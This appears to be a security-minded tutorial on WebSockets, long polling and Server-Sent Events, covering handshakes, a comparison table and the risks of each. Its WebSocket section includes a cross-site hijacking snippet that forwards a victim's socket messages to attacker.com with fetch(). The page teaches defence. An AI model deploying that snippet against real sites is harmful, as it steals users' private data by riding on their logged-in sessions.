WebSockets, Long Polling, and SSE
What You Will Learn
- How WebSockets work and why they are different from HTTP
- What Long Polling is and when it is used
- What Server-Sent Events (SSE) are and how they work
- Security issues specific to each technology
What Is It?
Traditional HTTP is request-response — the client asks, the server answers, then the connection closes. But some applications need real-time updates: chat apps, live dashboards, stock tickers. Three main techniques solve this problem: WebSockets, Long Polling, and Server-Sent Events (SSE).
Why It Matters
Each technology has unique security considerations. WebSocket connections bypass some browser protections. Real-time endpoints are often undertested compared to REST APIs.
Key Concepts
WebSockets
WebSockets open a bidirectional TCP connection between client and server. Both sides can send and receive messages at any time. The communication is bidirectional and stateful.
WebSocket Handshake
The connection starts as HTTP, then upgrades:
GET /chat HTTP/1.1
Host: example.com
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
Sec-WebSocket-Version: 13
Server response:
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: s3pPLMBiTxaQ9kYGzzhZRbK+xOo=
WebSocket Security Issues
- No automatic CSRF protection: WebSocket handshakes send cookies but do not require a CSRF token
- Cross-Site WebSocket Hijacking (CSWSH): If the server does not validate the
Originheader, an attacker can initiate a WebSocket from a malicious site - Lack of authentication: WebSocket messages after the handshake have no built-in auth
// Attacker page exploiting CSWSH
var ws = new WebSocket('wss://victim.com/chat');
ws.onmessage = function(evt) {
fetch('https://attacker.com/steal?data=' + encodeURIComponent(evt.data));
};
Long Polling
Long polling keeps a server-to-client connection open as long as possible. The server holds the request and only responds when new data is available or a timeout is reached. This is different from WebSockets — in long polling, only responses to requests are sent, not arbitrary messages.
Client Server
|------ GET /updates -------->|
| | (holds connection)
| | (new data arrives)
|<------ 200 + data ----------|
|------ GET /updates -------->| (immediately re-polls)
Server-Sent Events (SSE)
SSE is a one-way channel from server to client. The server pushes updates, but the client cannot send messages back over the same connection. It uses standard HTTP and works natively in browsers.
GET /events HTTP/1.1
Accept: text/event-stream
Server sends:
Content-Type: text/event-stream
data: {"price": 100}
data: {"price": 102}
SSE in JavaScript
const es = new EventSource('/events');
es.onmessage = function(evt) {
console.log('Update:', evt.data);
};
Comparison Table
| Feature | WebSockets | Long Polling | SSE |
|---|---|---|---|
| Direction | Bidirectional | Server to client | Server to client |
| Protocol | WS/WSS | HTTP | HTTP |
| Browser support | All modern | All | All (not IE) |
| Reconnect | Manual | Manual | Automatic |
| Security | Needs origin check | Standard HTTP | Standard HTTP |